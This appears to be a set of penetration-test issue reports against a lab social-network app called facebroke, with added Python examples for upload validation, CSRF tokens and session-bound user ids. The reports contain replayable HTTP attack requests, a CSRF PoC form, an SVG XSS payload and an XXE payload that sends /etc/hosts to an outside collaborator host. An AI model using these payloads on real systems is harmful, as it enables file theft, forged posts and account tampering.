
facebroke's Issues

Insecure File Upload

Steps to reproduce:

  1. Log in as any user
  2. Upload a new profile picture
  3. Upload any file type

I was able to upload docx, svg, xml, html, jsp, etc.

Attack Request:

POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"

Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"

profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document

<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--

Attack response:

HTTP/1.1 302 
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close
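The report above shows the /image endpoint storing whatever bytes and filename the client sends, with the client-chosen Content-Type as the only hint of what the file is. Below is an added example of the server-side check a profile-picture endpoint should perform instead; it is not code from the facebroke project, and the allowlist, size limit, and sample blobs (the first two trimmed from the payload types listed in the report, the rest constructed) are assumptions:

```python
import secrets
from typing import Dict, List, Tuple

# Allowlist for the profile-picture endpoint: extension -> magic bytes a real file
# of that type starts with. Everything else (docx, svg, xml, html, jsp, ...) is refused.
ALLOWED_SIGNATURES: Dict[str, List[bytes]] = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}

# Content that must never be stored under an image name whatever the extension says:
# XML/SVG/HTML markup (stored XSS, and XXE if anything later parses it) and ZIP
# containers such as OOXML .docx, which begin with the local-file-header bytes PK\x03\x04.
# Compared lower-cased against the lower-cased start of the upload.
REJECT_PREFIXES = (b"<?xml", b"<!doctype", b"<!entity", b"<svg", b"<html", b"<script", b"pk\x03\x04")

MAX_SIZE = 2 * 1024 * 1024  # assumed limit; the report does not state one


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an uploaded blob may be stored as a profile picture.

    The client-supplied Content-Type header is deliberately not an input: the
    attacker chooses it (the docx upload in the report declared a Word MIME type).
    """
    if not data:
        return False, "empty file"
    if len(data) > MAX_SIZE:
        return False, "file too large"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension '{ext}' is not an allowed image type"
    head = data[:32].lstrip().lower()
    if any(head.startswith(prefix) for prefix in REJECT_PREFIXES):
        return False, "content is markup or an archive, not an image"
    if not any(data.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return False, f"magic bytes do not match a .{ext} image"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never reuse the client's filename on disk: a random name with a server-chosen
    extension, so a 'shell.jsp' can never land in a servlet-served directory."""
    assert ext in ALLOWED_SIGNATURES
    return f"{secrets.token_hex(16)}.{ext}"


def download_headers(ext: str) -> Dict[str, str]:
    """Headers for serving a stored image: a fixed server-side type, nosniff so the
    browser never reinterprets the bytes, and a sandboxed CSP in case it still tries."""
    mime = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}[ext]
    return {"Content-Type": mime, "X-Content-Type-Options": "nosniff",
            "Content-Security-Policy": "sandbox"}


# Constructed samples: the first two are the kind of payload the report uploaded.
XXE_DOCX = b'<!ENTITY % data SYSTEM "file:///etc/hosts">'
SVG_XSS = b'<?xml version="1.0" standalone="no"?>\n<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
DOCX_ZIP = b"PK\x03\x04" + b"\x00" * 26 + b"[Content_Types].xml"
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17  # valid signature only, not a full image

if __name__ == "__main__":
    for name, blob in [("evil-xxe.docx", XXE_DOCX), ("image.svg", SVG_XSS), ("image.png", SVG_XSS),
                       ("pic.png", DOCX_ZIP), ("shell.jsp", b"<% Runtime.getRuntime() %>"), ("avatar.png", PNG_OK)]:
        print(name, validate_upload(name, blob))
```

The extension allowlist alone is not enough (an SVG renamed to .png is still served as markup if the browser sniffs it), which is why the content check and the nosniff header are both present.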

CSRF on submitting a new Post

The application is vulnerable to CSRF attacks on all POST requests.

Steps to reproduce:

  1. Login as any user
  2. Create a new post on the main page
  3. Capture the request using an intercepting proxy
  4. Launch the proof of concept using the proxy (in this case Burp Suite) by right-clicking on the request we want to try and navigating to Engagement tools -> Generate CSRF PoC
  5. Click test in browser

PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://192.168.99.100:8443/wall?user_id=1002" method="POST">
      <input type="hidden" name="on&#95;wall" value="1" />
      <input type="hidden" name="creator&#95;id" value="682" />
      <input type="hidden" name="type" value="TEXT" />
      <input type="hidden" name="content" value="CSRFed&#32;not&#32;myself" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Attack Request:

POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: http://burp/
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=682&type=TEXT&content=CSRFed+not+myself

Attack Response:

HTTP/1.1 302 
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:14:34 GMT
Connection: close

All the POST requests look vulnerable to a similar attack, as there are no CSRF tokens being used.
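The captured /wall request above succeeds because the only thing the server checks is the JSESSIONID cookie, which the browser attaches to the attacker's form post automatically. The following is an added example of the synchronizer-token check (plus an Origin check and SameSite cookie as defence in depth) that would have rejected the Burp PoC; it is not code from the facebroke project, and the session model, header names and the sample requests (built from the capture above) are assumptions:

```python
import hmac
import secrets
from typing import Dict, Tuple

SITE_ORIGIN = "https://192.168.99.100:8443"  # the host from the captures above


class Session:
    """Server-side session record (stands in for the JSESSIONID-backed session)."""

    def __init__(self, user_id: int) -> None:
        self.user_id = user_id
        # Synchronizer token: one unguessable value per session, embedded in every
        # state-changing form as a hidden field and compared on submission. An
        # attacker's page on another origin cannot read it, so it cannot copy it.
        self.csrf_token = secrets.token_urlsafe(32)


def csrf_check(session: Session, form: Dict[str, str], headers: Dict[str, str]) -> Tuple[bool, str]:
    """Return (accepted, reason) for a state-changing POST."""
    submitted = form.get("csrf_token", "")
    # compare_digest avoids leaking the token byte by byte through timing differences.
    if not submitted or not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return False, "missing or invalid CSRF token"
    # Defence in depth: a form posted from another site carries that site's Origin.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"cross-origin request from {origin}"
    return True, "ok"


def handle_wall_post(session: Session, form: Dict[str, str], headers: Dict[str, str]) -> Tuple[int, str]:
    """Minimal stand-in for POST /wall: 403 on CSRF failure, else the 302 seen in the capture."""
    ok, reason = csrf_check(session, form, headers)
    if not ok:
        return 403, reason
    return 302, f"wall?user_id={session.user_id}"


def set_cookie_header(session_id: str) -> str:
    """Cookie attributes that stop the browser attaching the session cookie to a
    cross-site POST at all (SameSite=Lax), independently of the token check."""
    return f"JSESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Constructed sample traffic mirroring the PoC above.
CSRF_FORM = {"on_wall": "1", "creator_id": "682", "type": "TEXT", "content": "CSRFed not myself"}
CSRF_HEADERS = {"Origin": "http://burp"}          # the attacker's page, not our site
LEGIT_HEADERS = {"Origin": SITE_ORIGIN}


def legit_form(session: Session) -> Dict[str, str]:
    """What the site's own form submits: the same fields plus the hidden token."""
    return dict(CSRF_FORM, csrf_token=session.csrf_token)


if __name__ == "__main__":
    victim = Session(user_id=1002)
    print(handle_wall_post(victim, CSRF_FORM, CSRF_HEADERS))          # (403, ...)
    print(handle_wall_post(victim, legit_form(victim), LEGIT_HEADERS))  # (302, 'wall?user_id=1002')
    print(set_cookie_header("D997F0ADEA6C0E4E5445D957349C22F0"))
```

Framework CSRF middleware does the same thing with less code; the point of the hand-rolled version is to make clear that the token is bound to the session, never to a value the attacker can supply.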

IDOR on posting on wall / news feed

Steps to Reproduce:

  1. Log in as any user
  2. Navigate to your wall
  3. Make a post on your own wall
  4. Capture the request using an intercepting proxy
  5. Resend the request after modifying the creator_id to any other user
  6. View your wall to see a post from the other user

Note: creator_id=682 is the Adam Perez user and user_id=1002 is me

Attack Request

POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Referer: https://192.168.99.100:8443/index
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=682&type=TEXT&content=not myself

Attack Response

HTTP/1.1 302 
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:10:57 GMT
Connection: close

IDOR on settings page

Steps to reproduce:

  1. Log in as a normal user
  2. Update your settings
  3. Capture the request using an intercepting proxy
  4. Resend the request after updating the id, target_id and name fields to those of another user
  5. Navigate to the other user's wall and see that their name has been changed

Attack Request:

POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

regLastName=Test&regPassword=&regDOB=1995-09-01&[email protected]&regUsername=otest&regFirstName=Olivia&target_id=486&regPasswordConfirm=

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close

IDOR on profile pic upload

Steps to reproduce:

  1. Log in as a normal user
  2. Update your profile picture with any picture
  3. Capture the request using an intercepting proxy
  4. Resend the request after changing the creator_id and owner_id to that of another user
  5. Navigate to the other user's wall and view the uploaded image

Attack Request:

POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"

486
----------207487880
Content-Disposition: form-data; name="creator_id"

486
----------207487880
Content-Disposition: form-data; name="context"

profile
----------207487880
Content-Disposition: form-data; name="label"

Test Picture
----------207487880--

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close

IDOR on comment

Steps to reproduce:

  1. Register and log in as a normal user
  2. Post a comment
  3. Intercept the request and change the creator id to another user
  4. Resend the request as the other user

Here are the request and response showing a comment being posted as another user. For reference, my user has an id of 1002.

Attack Request

POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment

Attack Response

HTTP/1.1 302 
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close
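The four IDOR reports (wall post, settings, profile picture, comment) are one bug: the handlers take the acting user's identity (creator_id, owner_id, target_id, the id in the settings URL) from the request body or query string instead of from the authenticated session. Below is an added example contrasting that pattern with handlers that derive the actor from the session and refuse any identity field that disagrees; it is not code from the facebroke project, and the in-memory store, handler signatures and sample bodies (taken from the captures above) are assumptions:

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List


class Forbidden(Exception):
    """Raised when a request names an identity or object the caller does not own."""


@dataclass
class Session:
    user_id: int  # set at login; the only trustworthy source of "who is acting"


@dataclass
class Store:
    """In-memory stand-in for the application's database (constructed for the demo)."""
    posts: List[Dict] = field(default_factory=list)
    comments: List[Dict] = field(default_factory=list)
    images: List[Dict] = field(default_factory=list)
    names: Dict[int, str] = field(default_factory=dict)


def create_post_vulnerable(session: Session, wall_user_id: int, form: Dict[str, str], store: Store) -> Dict:
    """The pattern the wall report demonstrates: the creator is whatever the body claims,
    so creator_id=682 sent from a session belonging to 1002 is stored as a post by 682."""
    post = {"creator_id": int(form["creator_id"]), "wall_user_id": wall_user_id, "content": form["content"]}
    store.posts.append(post)
    return post


def require_self(session: Session, claimed: str, name: str) -> int:
    """Accept an identity field only when it names the authenticated user. Rejecting,
    rather than silently overwriting the value, keeps tampering visible in the logs."""
    if int(claimed) != session.user_id:
        raise Forbidden(f"{name}={claimed} does not match session user {session.user_id}")
    return session.user_id


def create_post(session: Session, wall_user_id: int, form: Dict[str, str], store: Store) -> Dict:
    """Hardened POST /wall: creator_id must be the caller. (Whether 1002 may post on
    someone else's wall at all is a separate policy question the reports do not settle.)"""
    creator_id = require_self(session, form["creator_id"], "creator_id")
    post = {"id": len(store.posts) + 1, "creator_id": creator_id,
            "wall_user_id": wall_user_id, "content": form["content"]}
    store.posts.append(post)
    return post


def update_settings(session: Session, url_id: int, form: Dict[str, str], store: Store) -> str:
    """Hardened POST /settings?id=...: both the id in the URL and target_id in the body
    must be the caller, so the rename of user 486 from session 1002 is refused."""
    require_self(session, str(url_id), "id")
    require_self(session, form["target_id"], "target_id")
    store.names[session.user_id] = f'{form["regFirstName"]} {form["regLastName"]}'
    return store.names[session.user_id]


def upload_profile_picture(session: Session, form: Dict[str, str], store: Store) -> Dict:
    """Hardened POST /image: owner_id and creator_id are the caller, never the form."""
    require_self(session, form["owner_id"], "owner_id")
    require_self(session, form["creator_id"], "creator_id")
    image = {"owner_id": session.user_id, "creator_id": session.user_id, "label": form.get("label", "")}
    store.images.append(image)
    return image


def create_comment(session: Session, form: Dict[str, str], store: Store) -> Dict:
    """Hardened POST /comment: creator_id is the caller, and the post must exist."""
    creator_id = require_self(session, form["creator_id"], "creator_id")
    post_id = int(form["post_id"])
    if not any(p.get("id") == post_id for p in store.posts):
        raise Forbidden(f"post_id={post_id} does not exist")
    comment = {"creator_id": creator_id, "post_id": post_id, "content": form["content"]}
    store.comments.append(comment)
    return comment


def is_forbidden(handler: Callable, *args) -> bool:
    """True when the handler rejects the request (used by the demo below)."""
    try:
        handler(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    me, db = Session(user_id=1002), Store()
    # Bodies from the captures above: the caller is 1002, the claimed actor is someone else.
    print(create_post_vulnerable(me, 1002, {"creator_id": "682", "content": "not myself"}, db))
    print(is_forbidden(create_post, me, 1002, {"creator_id": "682", "content": "not myself"}, db))
    print(is_forbidden(update_settings, me, 486, {"target_id": "486", "regFirstName": "Olivia", "regLastName": "Test"}, db))
    print(is_forbidden(upload_profile_picture, me, {"owner_id": "486", "creator_id": "486", "label": "Test Picture"}, db))
    print(is_forbidden(create_comment, me, {"creator_id": "486", "post_id": "2892", "content": "Sandra Comment"}, db))
```

The simplest fix of all is to drop the identity fields from the forms entirely and read the actor from the session; the check above is for the case where the fields stay in the protocol and you want a mismatch to be an auditable event rather than a silent correction.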
